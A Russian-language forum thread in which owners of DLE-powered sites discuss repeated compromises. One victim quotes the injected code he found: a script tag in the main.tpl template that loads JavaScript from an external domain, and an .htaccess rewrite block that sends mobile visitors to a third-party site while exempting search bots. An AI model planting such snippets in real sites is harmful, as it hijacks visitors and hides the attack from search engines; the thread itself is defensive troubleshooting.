Модуля "Переходы" никогда не было и нет. Из модулей установлен только "Карта сайта 3.6".
Админов лишних нету. Движок заново не переустанавливал, только обновлял с 9.2 до 9.3. Менял пароли от фтп и админа, от базы данных не поменял.
Будет печально потратить время на полную переустановку DLE и смену всех паролей, и не получить никакого результата... Но если решения не найдётся то так и сделаю.
Код найден, но толку то от этого? Нужно найти дыру в DLE, через которую осуществляется взлом. Неужели больше ни у кого с этого форума не было такой проблемы? У кого есть хотя бы какие-нибудь предположения на что обратить внимание - высказывайте их. После взлома обновил DLE до 9.3, не помогло, код добавили опять.
Это всё отлично, но взломы сайтов продолжаются. А ваша партнёрка находится чёрном списке антивируса Касперского, это тоже никак не плюс к репутации.
Тех кто разбирается не только в манимэйкинге, но и в безопасности и защите сайтов от взломов, приглашают в тему > /ru/forum/644873 < для совместного поиска решения проблемы. Вредоносный код на сайте найти не трудно, но бесполезно. Нужно найти дыру в движке. Как я понял ломают только DLE, даже самой последней версии.
Столкнулся с такой же проблемой, но к сожалению очень поздно понял в чём причина. Ещё в первых числах месяца посещаемость сайта резко просела с 1000+ посетителей в сутки до ~100. Я ничего не понимал, потому что по позициям в поисковых системах никаких ухудшений не было. Думал это временно, но через пару дней сайт полностью вылетел из Яндекса. Внешне с сайтом всё было впорядке, и видимо из-за своей неопытности, я только сегодня попытался зайти на сайт через гугл. Вбил запрос, перешёл на сайт и опа! Редирект! Начал искать что к чему, обнаружил что мой сайт был взломан и злоумышленники добавили в main.tpl шаблона:
<script src=http://promediagroup.ru/d.js></script>
Далее я нашёл ещё один неприятный момент, в .htaccess который располагается в корне сайта, было добавлено:
RewriteCond %{HTTP_USER_AGENT} MIDP [NC,OR] RewriteCond %{HTTP_USER_AGENT} WAP [NC,OR] RewriteCond %{HTTP_USER_AGENT} Windows.CE [NC,OR] RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR] RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR] RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} Mobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} Symbian [NC] RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC] RewriteCond %{HTTP_USER_AGENT} !bsd [NC] RewriteCond %{HTTP_USER_AGENT} !x11 [NC] RewriteCond %{HTTP_USER_AGENT} !unix [NC] RewriteCond %{HTTP_USER_AGENT} !macos [NC] RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] RewriteCond %{HTTP_USER_AGENT} !playstation [NC] RewriteCond %{HTTP_USER_AGENT} !google [NC] RewriteCond %{HTTP_USER_AGENT} !yandex [NC] RewriteCond %{HTTP_USER_AGENT} !bot [NC] RewriteCond %{HTTP_USER_AGENT} !ipad [NC] RewriteCond %{HTTP_USER_AGENT} !android [NC] RewriteCond %{HTTP_USER_AGENT} !iphone [NC] RewriteCond %{HTTP_USER_AGENT} !libwww [NC] RewriteCond %{HTTP_USER_AGENT} !msn [NC] RewriteCond %{HTTP_USER_AGENT} !fdm [NC] RewriteCond %{HTTP_USER_AGENT} !maui [NC] RewriteCond %{HTTP_USER_AGENT} !webmoney [NC] RewriteRule ^(.*)$ http://mobile-premium.com/opera?wkey=2475 [L,R=302]
Это приводило к тому, что все пользователи, которые заходили на сайт с телефонов, редиректились на другой сайт. Этот редирект работал не зависимо от того перешёл ты на сайт из поисковика или напрямую.
Избавляйся от проблемы, желаю удачи, помог чем смог.
И ещё вопрос. Сейчас в индексе Яндекса осталось только две страницы моего сайта, нужно ли куда-нибудь написать, чтобы сайт нормально проиндексировался? Боюсь что за такие редиректы на непонятные вредоносные сайты, на меня могли наложить какие-нибудь ограничения. И если всё-таки я попал под какой-нибудь фильтр, то как об этом узнать? Заранее спасибо тому, кто сможет дать грамотный ответ на вопросы.
